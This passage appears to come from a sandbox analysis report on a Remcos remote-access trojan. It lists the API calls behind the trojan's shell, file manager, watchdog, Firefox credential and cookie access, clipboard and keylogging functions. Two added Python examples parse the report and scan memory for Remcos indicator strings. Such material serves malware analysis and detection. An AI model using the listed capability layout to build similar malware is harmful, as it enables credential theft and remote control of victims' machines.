  • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
  • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
  • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
  • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
  • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000288,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
  • Part of subcall function 00404468: SetEvent.KERNEL32(00000288,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
• GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
• SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
• DeleteFileA.KERNEL32(?), ref: 004078CC
  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
  • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
  • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
• Sleep.KERNEL32(000007D0), ref: 00407976
• StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
  • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
• String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
• API String ID: 2918587301-599666313
• Opcode ID: 50e73a33b6ef1ff8e914a00898bc6f7894d442b86e537ee4705b72ee379ce38f
• Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
• Opcode Fuzzy Hash: 50e73a33b6ef1ff8e914a00898bc6f7894d442b86e537ee4705b72ee379ce38f
• Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
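Each block in this listing has the same shape: an "APIs" list in which direct calls and "Part of subcall function" entries are interleaved, a "Memory Dump Source" section naming the dump the function was lifted from, and "Similarity" fields whose Instruction Fuzzy Hash is the value to pivot on when hunting for the same function in reports of other samples. The Python below is an added example, not part of the Joe Sandbox report or its tooling: a parser for this text format that turns a block into structured calls, recovers the readable strings from the "$"-separated String ID field, and indexes blocks by their Instruction Fuzzy Hash. Its sample input is an abridged copy of the file-manager block on this page; the rule that drops String ID tokens shorter than four characters (the H@G / x@G style fragments, which are pointer bytes rather than text) is an assumption the report itself does not state.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# A call line looks like "SetEvent.KERNEL32(?), ref: 00406F28"; args are optional
# ("CloseHandle.KERNEL32 ref: 004053CD") and never contain a closing parenthesis.
_CALL_RE = (r"(?P<api>[^.\s(]+)\.(?P<module>\w+)"
            r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
_DIRECT = re.compile(r"^•\s*" + _CALL_RE)
_CALL = re.compile(r"^" + _CALL_RE)
_SUBCALL = re.compile(r"^•\s*Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*(?P<call>.+)$")
_FIELD = re.compile(r"^•\s*(?P<key>[A-Za-z_ ]+?):\s*(?P<val>.*)$")
_HEADERS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Yara matches", "Similarity"}
MIN_STRING_LEN = 4  # assumption: shorter "$"-separated tokens are pointer bytes, not text


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: str
    parent: Optional[str] = None  # address of the callee when reached via "Part of subcall function"


@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)

    @property
    def direct_apis(self):
        return [c.api for c in self.calls if c.parent is None]

    @property
    def strings(self):
        """Readable literals from the String ID field, deduplicated, junk tokens dropped."""
        seen, out = set(), []
        for tok in self.fields.get("String ID", "").split("$"):
            if len(tok) >= MIN_STRING_LEN and tok not in seen:
                seen.add(tok)
                out.append(tok)
        return out


def _call_from_match(m, parent=None):
    args = m.group("args")
    return Call(api=m.group("api"), module=m.group("module"),
                args=[a.strip() for a in args.split(",")] if args else [],
                ref=m.group("ref").upper(), parent=parent)


def parse_report(text: str):
    """Split a Joe Sandbox function listing into FunctionBlock records, one per 'APIs' header."""
    blocks, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur, section = FunctionBlock(), "apis"
            blocks.append(cur)
            continue
        if cur is None:
            continue
        if line in _HEADERS:
            section = line
            continue
        if section == "apis":
            m = _SUBCALL.match(line)
            if m:
                cm = _CALL.match(m.group("call"))
                if cm:
                    cur.calls.append(_call_from_match(cm, parent=m.group("parent").upper()))
                continue
            m = _DIRECT.match(line)
            if m:
                cur.calls.append(_call_from_match(m))
            continue
        m = _FIELD.match(line)
        if m:
            cur.fields[m.group("key")] = m.group("val").strip()
    return blocks


def index_by_instruction_hash(blocks):
    """Pivot key for matching the same function across reports of different samples."""
    return {b.fields["Instruction Fuzzy Hash"]: b for b in blocks if "Instruction Fuzzy Hash" in b.fields}


# Abridged copy of the file-manager block from this report, used as sample input.
SAMPLE_REPORT = r"""
APIs
• SetEvent.KERNEL32(?), ref: 00406F28
• DeleteFileW.KERNEL32(00000000), ref: 00407018
  • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
  • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
  • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
• Sleep.KERNEL32(000007D0), ref: 00407976
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove
• String ID: Browsing directory: $Deleted file: $H@G$Unable to rename file!$V>G$open$x@G$x@G$>G
• API String ID: 2918587301-599666313
• Opcode ID: 50e73a33b6ef1ff8e914a00898bc6f7894d442b86e537ee4705b72ee379ce38f
• Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
• Opcode Fuzzy Hash: 50e73a33b6ef1ff8e914a00898bc6f7894d442b86e537ee4705b72ee379ce38f
• Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
"""


if __name__ == "__main__":
    for blk in parse_report(SAMPLE_REPORT):
        print("direct APIs:", ", ".join(blk.direct_apis))
        print("strings:", blk.strings)
        print("pivot hash:", blk.fields.get("Instruction Fuzzy Hash"))
```

The parser keeps subcall entries in the same list as direct calls, tagged with the parent address, because the interleaving is what shows which helper (here 0041B42F, the directory walker, and 00404468, the socket sender) a function reaches at each step.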
APIs
• __Init_thread_footer.LIBCMT ref: 0040508E
  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
  • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
• __Init_thread_footer.LIBCMT ref: 004050CB
• CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
• CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
• Sleep.KERNEL32(0000012C,00000093), ref: 0040523F
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
• ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
• WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
• Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
• TerminateProcess.KERNEL32(00000000), ref: 004053C1
• CloseHandle.KERNEL32 ref: 004053CD
• CloseHandle.KERNEL32 ref: 004053D5
• CloseHandle.KERNEL32 ref: 004053E7
• CloseHandle.KERNEL32 ref: 004053EF
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
• String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
• API String ID: 3815868655-81343324
• Opcode ID: 3d2e7fcd9904bea199581b2d36fd21f78a04208000f5627f9ddf2270b822dfe6
• Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
• Opcode Fuzzy Hash: 3d2e7fcd9904bea199581b2d36fd21f78a04208000f5627f9ddf2270b822dfe6
• Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
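The String ID fields are the most reusable part of these blocks: they are the literals a triage script can look for in a process dump to tell which Remcos modules were unpacked, and the pipe-driven cmd.exe loop in this block (CreatePipe, CreateProcessA, PeekNamedPipe, ReadFile, WriteFile, TerminateProcess) is the one whose strings are least distinctive on their own. The Python below is an added example, not part of the Joe Sandbox report or its tooling: it scans a memory region for the strings the report lists for the file-manager, cmd.exe-shell and watchdog functions, weights the Remcos-specific ones above generic ones such as cmd.exe and SystemDrive, and returns a per-capability result. The capability names, the strong/weak split, the two-weak-strings rule and the search in both ANSI and UTF-16LE (the report does not state the encoding) are the editor's assumptions, and the sample region is constructed rather than a real dump.

```python
# Capability indicators taken from the String ID fields of the function blocks in this
# report. "strong" strings are specific to Remcos; "weak" ones also occur in benign software
# and only count in combination. Grouping them into capabilities is the editor's reading of
# which function each block implements, not a label the report itself assigns.
CAPABILITIES = {
    "file_manager": {
        "strong": ["Browsing directory: ", "Downloading file: ", "Downloaded file: ",
                   "Executing file: ", "Failed to download file: ",
                   "Unable to rename file!", "Unable to delete: "],
        "weak": ["Deleted file: "],
    },
    "remote_shell": {"strong": [], "weak": ["cmd.exe", "SystemDrive"]},
    "watchdog": {
        "strong": ["Remcos restarted by watchdog!", "Watchdog module activated",
                   "Watchdog launch failed!", "rmclient.exe"],
        "weak": ["svchost.exe", "fsutil.exe", "WinDir"],
    },
}

# Assumption: the report does not say whether these strings are ANSI or UTF-16LE in the
# dump, so both encodings are searched.
ENCODINGS = (("ascii", "ascii"), ("utf-16le", "utf-16-le"))


def find_all(haystack: bytes, needle: bytes):
    """Yield every offset of needle in haystack, including overlapping occurrences."""
    start = 0
    while True:
        i = haystack.find(needle, start)
        if i < 0:
            return
        yield i
        start = i + 1


def scan_region(data: bytes) -> dict:
    """Return {capability: [(offset, encoding, string, strength), ...]} for every hit."""
    hits = {}
    for cap, groups in CAPABILITIES.items():
        for strength, strings in groups.items():
            for s in strings:
                for label, codec in ENCODINGS:
                    for off in find_all(data, s.encode(codec)):
                        hits.setdefault(cap, []).append((off, label, s, strength))
    return hits


def assess(hits: dict):
    """Decide which capabilities are present and whether the region looks like Remcos.

    A capability counts when one of its strong strings hit, or when at least two distinct
    weak strings hit. The overall verdict additionally requires a strong hit somewhere, so a
    region that only contains cmd.exe is never flagged.
    """
    present = {}
    for cap, found in hits.items():
        strong = {s for _, _, s, st in found if st == "strong"}
        weak = {s for _, _, s, st in found if st == "weak"}
        if strong or len(weak) >= 2:
            present[cap] = sorted(strong | weak)
    any_strong = any(st == "strong" for found in hits.values() for *_, st in found)
    return any_strong, present


def build_sample_region() -> bytes:
    """Constructed stand-in for the dumped 0x400000 region: filler bytes with a few of the
    report's strings planted at known offsets. This is not real Remcos memory."""
    region = bytearray(b"\x00" * 0x40 + b"MZ" + b"\x90" * 0x200)

    def put(off, blob):
        region[off:off + len(blob)] = blob

    put(0x100, b"Remcos restarted by watchdog!\x00")
    put(0x140, "Browsing directory: ".encode("utf-16-le"))
    put(0x180, b"cmd.exe\x00")
    put(0x190, b"SystemDrive\x00")
    return bytes(region)


# Constructed negative case: a generic string on its own must not produce a verdict.
BENIGN_REGION = b"\x00" * 32 + b"cmd.exe\x00" + b"\x00" * 32


if __name__ == "__main__":
    flagged, caps = assess(scan_region(build_sample_region()))
    print("remcos-like:", flagged)
    for cap, strings in caps.items():
        print(f"  {cap}: {strings}")
```

To run it on the real thing, feed scan_region the bytes of the 0x400000 .sdmp instead of the constructed region; the offsets it returns are relative to the start of that region, so add the dump's Offset field (00400000 here) to turn them into virtual addresses that can be cross-referenced with the ref: values in the listing.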
APIs
• GetCurrentProcessId.KERNEL32 ref: 00410F45
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
• CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
  • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
  • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
  • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
• CloseHandle.KERNEL32(00000000), ref: 00410F90
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
• String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
• API String ID: 65172268-860466531
• Opcode ID: 6cb90c24799a52b9daff74bd536492276d9664ab1cc401aaf178b25b8aac1b68
                                                                                                                                                                                                                                  • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cb90c24799a52b9daff74bd536492276d9664ab1cc401aaf178b25b8aac1b68
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$CloseFile$FirstNext
                                                                                                                                                                                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                                                                                                                                                  • API String ID: 1164774033-3681987949
                                                                                                                                                                                                                                  • Opcode ID: 8b8f82a643f35a99610966d45e920ea2d249c46f326294340934235e9e6ef364
                                                                                                                                                                                                                                  • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b8f82a643f35a99610966d45e920ea2d249c46f326294340934235e9e6ef364
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Find$Close$File$FirstNext
                                                                                                                                                                                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                                                                                                                                                  • API String ID: 3527384056-432212279
                                                                                                                                                                                                                                  • Opcode ID: daa18327bdb53cfe7cb7a4aefc52122e2e13f856f6a04d4e17db2c25bacbd10c
                                                                                                                                                                                                                                  • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: daa18327bdb53cfe7cb7a4aefc52122e2e13f856f6a04d4e17db2c25bacbd10c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000440,00000000,00000000), ref: 10007054
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: OpenProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3743895883-0
                                                                                                                                                                                                                                  • Opcode ID: 5123f2d251da449f23a0145715559065d7c177eff71aa2cd70a97f408bb63da0
                                                                                                                                                                                                                                  • Instruction ID: 3fc6cb16c2acb38648db70abfd8e28bf1beac7dae34e75593325fef57f3a6704
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5123f2d251da449f23a0145715559065d7c177eff71aa2cd70a97f408bb63da0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F3717FB1E00219BBFB10DBA4DC85FEE77B8EF04794F1041A5FA08E6195E7759A01CBA1
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                                                                                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                                                                                                                                  • API String ID: 726551946-3025026198
                                                                                                                                                                                                                                  • Opcode ID: 595b200ebc38179fa99798b57444edb002c7752eddbd804751fc8e9fe5b1f8b0
                                                                                                                                                                                                                                  • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 595b200ebc38179fa99798b57444edb002c7752eddbd804751fc8e9fe5b1f8b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 004159C7
                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
• GlobalLock.KERNEL32(00000000), ref: 004159FE
• GlobalUnlock.KERNEL32(00000000), ref: 00415A34
• SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID:
• API String ID: 3520204547-0
• Opcode ID: c2e940ea863fb9686de185adfd037cf3e930d987ca06f45f9b4980846c20bf7d
• Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
• Opcode Fuzzy Hash: c2e940ea863fb9686de185adfd037cf3e930d987ca06f45f9b4980846c20bf7d
• Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
• Opcode ID: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
• Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
• Opcode Fuzzy Hash: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
• Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
APIs
• GetForegroundWindow.USER32 ref: 00409B3F
• GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
• GetKeyboardLayout.USER32(00000000), ref: 00409B52
• GetKeyState.USER32(00000010), ref: 00409B5C
• GetKeyboardState.USER32(?), ref: 00409B67
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
